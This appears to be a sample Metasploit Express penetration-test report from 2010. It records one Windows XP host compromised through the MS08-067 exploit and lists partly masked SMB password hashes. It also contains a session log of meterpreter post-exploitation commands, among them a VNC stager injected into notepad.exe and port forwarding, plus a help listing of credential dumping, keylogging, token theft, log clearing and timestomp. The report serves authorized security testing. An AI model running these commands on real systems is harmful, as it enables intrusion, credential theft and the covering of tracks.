Back to Reports

Detailed Audit Report

Executive Summary

Project Summary

Started:2010-06-02 01:42:19 UTC
Completed:2010-06-02 02:49:27 UTC

This report contains the results of a security audit performed by Metasploit Express from Rapid7 LLC. It contains confidential information about the state of your network. Access to this information by unauthorized personnel may allow them to compromise your network.

During this test, 3 hosts with a total of 10 exposed services were discovered. Of these, 1 were compromised and 6 passwords were obtained. The most common module used to compromise systems among 75 unique modules was exploit/windows/smb/ms08_067_netapi (1 sessions). From the compromised systems, 4 data files were obtained, including 1 screenshot.

Detailed Audit Report Summary

This report contains the details of all hosts discovered during the penetration test. It lists major findings, hosts discovered, and details of sessions opened during the penetration test.

Major Findings

This section lists high-priority problems including host compromises and discovered passwords.

Compromised hosts by address
Compromised System Attack Module Session Information Vulnerability References exploit/windows/smb/ms08_067_netapi CVE-2008-4250, OSVDB-49243, MSB-MS08-067, Rapid7 Vulnerability DB

Authentication Tokens

Address Type User Password or Hash Additional Information smb admin e52caxxxxxxxxxxxxxx629b565:5835048ce9xxxxxxxxx924a03510ef smb Administrator e52caxxxxxxxxxxxxxx629b565:5835048ce9xxxxxxxxx924a03510ef smb Guest e52caxxxxxxxxxxxxxx629b565:5835048ce9xxxxxxxxx924a03510ef smb HelpAssistant e52caxxxxxxxxxxxxxx629b565:5835048ce9xxxxxxxxx924a03510ef smb SUPPORT_388945a0 e52caxxxxxxxxxxxxxx629b565:5835048ce9xxxxxxxxx924a03510ef smb test e52caxxxxxxxxxxxxxx629b565:5835048ce9xxxxxxxxx924a03510ef


Discovered hosts
Address Hostname OS Name Services Vulns Files Notes Compromised? asdf-b9ca10e6b9 Microsoft Windows XP 5 1 4 10 yes Linux (Ubuntu) 2 2 no Linux (Ubuntu) 3 2 no

Discovery - Host Details - asdf-b9ca10e6b9

Discovered: 2010-06-02 01:44:28 UTC
Operating System: Microsoft Windows XP
Ethernet Address: 00:00:00:c1:1b:08
System Type: client

Authentication Tokens

Time Address Type User Password or Hash Additional Information
2010-06-02 02:44:36 UTC smb admin e52caxxxxxxxxxxxxxx629b565:5835048ce9xxxxxxxxx924a03510ef
2010-06-02 02:44:36 UTC smb Administrator e52caxxxxxxxxxxxxxx629b565:5835048ce9xxxxxxxxx924a03510ef
2010-06-02 02:44:36 UTC smb Guest e52caxxxxxxxxxxxxxx629b565:5835048ce9xxxxxxxxx924a03510ef
2010-06-02 02:44:36 UTC smb HelpAssistant e52caxxxxxxxxxxxxxx629b565:5835048ce9xxxxxxxxx924a03510ef
2010-06-02 02:44:36 UTC smb SUPPORT_388945a0 e52caxxxxxxxxxxxxxx629b565:5835048ce9xxxxxxxxx924a03510ef
2010-06-02 02:44:36 UTC smb test e52caxxxxxxxxxxxxxx629b565:5835048ce9xxxxxxxxx924a03510ef

Successful Attacks
Time ID Exploit Information
2010-06-02 02:39:54 UTC 1 (x19vv6ji) exploit/windows/smb/ms08_067_netapi

Exploited Vulnerabilities

Microsoft Server Service Relative Path Stack Corruption

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development. created at 2010-06-02 02:44:37 UTC

Active Services

Name Port Service Information
ntp 123/udp Microsoft NTP
msrpc 135/tcp
netbios 137/udp ASDF-B9CA10E6B9:<00>:U :WORKGROUP:<00>:G :ASDF-B9CA10E6B9:<20>:U :WORKGROUP:<1e>:G :WORKGROUP:<1d>:U :__MSBROWSE__:<01>:G :08:00:00:00:0:08
smb 139/tcp
smb 445/tcp Windows XP Service Pack 2 (language: English) (name:ASDF-B9CA10E6B9) (domain:WORKGROUP) - Unknown

Discovered: 2010-06-02 01:44:28 UTC
Operating System: Linux (Ubuntu)
Ethernet Address:
System Type: server

Active Services

Name Port Service Information
ssh 22/tcp SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu3
http 80/tcp Apache/2.2.14 (Ubuntu) - Unknown

Discovered: 2010-06-02 01:44:28 UTC
Operating System: Linux (Ubuntu)
Ethernet Address: 08:00:27:41:28:FD
System Type: server

Active Services

Name Port Service Information
ssh 22/tcp SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1.2
ntp 123/udp NTP v4 (unsynchronized)
http 8080/tcp Mongrel 1.1.3

Session Details

Session ID x19vv6ji, created by exploit/windows/smb/ms08_067_netapi

Event Time Event Type Session Data
Jun 02 02:39:54 session_open  
Jun 02 02:39:56 session_command
use stdapi
Jun 02 02:39:57 session_command
use priv
Jun 02 02:45:31 session_command
run vnc -O -t -i -c -V -p 58240 -v 50679
Jun 02 02:45:32 session_output
[*] Creating a VNC bind tcp stager: RHOST= LPORT=58240
[*] Running payload handler
Jun 02 02:45:33 session_command
portfwd add -L -l 58240 -p 58240 -r
Jun 02 02:49:04 session_output
[*] Host process notepad.exe has PID 3880
[*] Allocated memory at address 0x003a0000, for 298 byte stager
[*] Writing the VNC stager into memory...
[*] Starting the port forwarding from 58240 => TARGET:58240
[*] Local TCP relay created: <->
Jun 02 02:49:26 session_command
Jun 02 02:49:27 session_output
Core Commands

    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    bgkill        Kills a background meterpreter script
    bglist        Lists running background scripts
    bgrun         Executes a meterpreter script as a background thread
    channel       Displays information about active channels
    close         Closes a channel
    exit          Terminate the meterpreter session
    help          Help menu
    interact      Interacts with a channel
    irb           Drop into irb scripting mode
    migrate       Migrate the server to another process
    quit          Terminate the meterpreter session
    read          Reads data from a channel
    run           Executes a meterpreter script
    use           Load a one or more meterpreter extensions
    write         Writes data to a channel

Stdapi: File system Commands

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    del           Delete the specified file
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    upload        Upload a file or directory

Stdapi: Networking Commands

    Command       Description
    -------       -----------
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table

Stdapi: System Commands

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getpid        Get the current process identifier
    getprivs      Get as many privileges as possible
    getuid        Get the user that the server is running as
    kill          Terminate a process
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components

Priv: Elevate Commands

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.

Priv: Password database Commands

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database

Priv: Timestomp Commands

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes